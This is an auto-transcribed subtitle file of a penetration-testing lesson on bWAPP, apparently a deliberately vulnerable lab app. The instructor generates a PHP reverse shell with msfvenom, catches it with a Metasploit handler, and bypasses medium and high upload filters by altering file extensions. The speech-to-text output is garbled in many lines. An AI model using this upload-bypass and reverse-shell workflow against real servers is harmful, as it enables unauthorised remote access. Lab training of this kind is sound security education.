1
00:00:00,480 --> 00:00:07,710
Now, another problem that you will probably see while you are testing unrestricted file upload forms.

2
00:00:08,870 --> 00:00:12,860
And sometimes you can bypass restrictions if they're not properly coated.

3
00:00:13,780 --> 00:00:21,340
So in this lesson, we are going to be dealing with an unrestricted file upload challenge, you'll see

4
00:00:21,340 --> 00:00:21,900
why in a minute.

5
00:00:22,360 --> 00:00:29,260
So go to Cali and log in to be web and open unrestricted file upload page from the menu.

6
00:00:32,110 --> 00:00:36,130
Now to see how it works, browse and then choose a picture on your computer.

7
00:00:37,980 --> 00:00:39,360
And then upload the file.

8
00:00:40,580 --> 00:00:47,300
And you will see a link below, so click it to the image yeah, I uploaded said.

9
00:00:48,890 --> 00:00:55,070
So, OK, enable Foxy Knoxy and I'm going to arrange the view for you here, so.

10
00:00:56,690 --> 00:00:57,610
We can look at the code.

11
00:01:02,920 --> 00:01:04,870
Now, there's no check for a low level.

12
00:01:06,060 --> 00:01:09,960
But for medium file, upload, check one is called.

13
00:01:11,180 --> 00:01:13,760
And for high level check two is called.

14
00:01:15,200 --> 00:01:21,350
OK, exit now, I created a folder for this example before, so I'm going to go to that folder.

15
00:01:22,290 --> 00:01:25,890
And I'm going to prepare a shell with MSF venom tool.

16
00:01:27,020 --> 00:01:34,910
So type MSF venom does p p p slash interpreters slash reverse Tsipi for the payload?

17
00:01:38,100 --> 00:01:45,960
And almost equals one nine two one six eight two zero four one to eight for the localhost dress and

18
00:01:45,960 --> 00:01:52,500
Bellport equals four four for three for the local port and Cali and the file name.

19
00:01:54,220 --> 00:01:58,330
And now we can provide some other parameters to MSF venom.

20
00:02:00,200 --> 00:02:03,350
But we don't need this for this example.

21
00:02:04,340 --> 00:02:05,120
So.

22
00:02:07,690 --> 00:02:09,370
OK, the payload is created.

23
00:02:10,700 --> 00:02:14,870
So here it is, my folder, and this is the content.

24
00:02:16,260 --> 00:02:20,010
All right, so we're done here, so then go back to Firefox's.

25
00:02:21,110 --> 00:02:26,840
Well, browser images, but choose shelled out and uploaded.

26
00:02:28,430 --> 00:02:30,660
Offload request is in berp on the right.

27
00:02:31,890 --> 00:02:34,110
And you can see the content of the file.

28
00:02:35,910 --> 00:02:40,200
And the content type is Application XP, HP.

29
00:02:40,950 --> 00:02:41,970
OK, so let it go.

30
00:02:44,060 --> 00:02:46,310
And the link appears on the page.

31
00:02:47,670 --> 00:02:50,040
But now, before clicking, let's go back to terminal.

32
00:02:51,880 --> 00:02:58,060
Now, I forgot to create a handler to capture the reverse connection, so open Métis Boyte.

33
00:03:01,240 --> 00:03:05,470
OK, so use exploit slash multigrain handler.

34
00:03:07,090 --> 00:03:11,440
And then set payload to reverse TCP.

35
00:03:15,580 --> 00:03:18,490
And you can set localhost the IP address of Carly.

36
00:03:22,350 --> 00:03:24,750
And so the local board to four, four, four, three.

37
00:03:26,650 --> 00:03:28,930
So one more time, we'll show the options.

38
00:03:30,600 --> 00:03:34,950
And then type exploit RSJ to run a background job.

39
00:03:35,820 --> 00:03:39,720
OK, so go to Firefox and click here to see the show.

40
00:03:41,580 --> 00:03:44,250
And the session is open in terminal.

41
00:03:45,770 --> 00:03:48,500
So type sessions to list sessions.

42
00:03:49,770 --> 00:03:52,140
And interact with the session one.

43
00:03:53,590 --> 00:03:57,550
Type get Eweida for the user of the open show.

44
00:03:58,630 --> 00:04:05,410
And then info, you see the basic info about the open shell, exit the shell.

45
00:04:06,540 --> 00:04:10,260
And go back to Firefox's, so now I will increase a level.

46
00:04:11,430 --> 00:04:12,420
So choose minium.

47
00:04:13,680 --> 00:04:15,570
And try to upload the shell again.

48
00:04:19,700 --> 00:04:23,600
And there's a year because these extensions are not allowed.

49
00:04:25,300 --> 00:04:27,430
OK, so it's a naval interception.

50
00:04:28,850 --> 00:04:30,830
And then upload the shell file again.

51
00:04:33,530 --> 00:04:35,180
That request is here in berp.

52
00:04:37,100 --> 00:04:44,060
OK, so change the extension in the file name and just add three to the end, that's all.

53
00:04:45,080 --> 00:04:46,340
And send the request.

54
00:04:47,820 --> 00:04:54,270
And a link for viewing the uploaded image is right here on the page, but before we do that, let's

55
00:04:54,630 --> 00:04:55,710
let's grab a listener.

56
00:04:56,580 --> 00:05:01,380
So start the handler and metastable by typing, exploit J.

57
00:05:04,570 --> 00:05:05,740
Now click the link.

58
00:05:07,790 --> 00:05:09,440
Perfect sessions open.

59
00:05:11,020 --> 00:05:12,940
So interact with session to.

60
00:05:14,700 --> 00:05:19,950
And we'll run get your ID, the user is w w w data.

61
00:05:21,020 --> 00:05:24,950
And this info for the basic information about the shell.

62
00:05:26,270 --> 00:05:27,170
And then you can exit.

63
00:05:28,690 --> 00:05:30,430
Now, go back to Firefox again.

64
00:05:31,520 --> 00:05:33,980
And I'm going to increase a level one more.

65
00:05:35,040 --> 00:05:39,900
So select high and now try to upload the shale file again.

66
00:05:42,450 --> 00:05:43,920
And there's our friend, the error.

67
00:05:45,440 --> 00:05:49,800
But this time it allows only these extensions.

68
00:05:50,650 --> 00:05:55,370
OK, so enable interception and upload the file.

69
00:05:57,720 --> 00:06:02,160
And this time, the problem can be solved by adding a suitable extension to the file name.

70
00:06:04,710 --> 00:06:06,200
And let it go.

71
00:06:08,390 --> 00:06:11,810
And there's the upload, problem solved.

72
00:06:12,590 --> 00:06:13,250
Here's a link.

73
00:06:14,790 --> 00:06:17,010
So open the terminal and start the handler.

74
00:06:18,240 --> 00:06:19,740
OK, it is done.

75
00:06:21,930 --> 00:06:22,830
Now click the link.

76
00:06:24,870 --> 00:06:26,010
Hey, nothing happened.

77
00:06:27,230 --> 00:06:28,130
There's no session.

78
00:06:29,310 --> 00:06:30,030
It doesn't work.

79
00:06:31,040 --> 00:06:40,070
Because the application tries to open an image file, but remember, it's a file, so it gets confused,

80
00:06:40,070 --> 00:06:42,260
throws an error without executing it.

81
00:06:43,600 --> 00:06:46,960
So we cannot directly execute this show.

82
00:06:47,850 --> 00:06:56,370
But remember, we discovered Elfy on the Web so we can use Elfy to include our shell into the application.

83
00:06:57,350 --> 00:06:58,860
But that's for you to do.

84
00:06:59,300 --> 00:07:02,630
I know you know how, because we did Elfy several times.

85
00:07:03,380 --> 00:07:04,190
Have fun with that.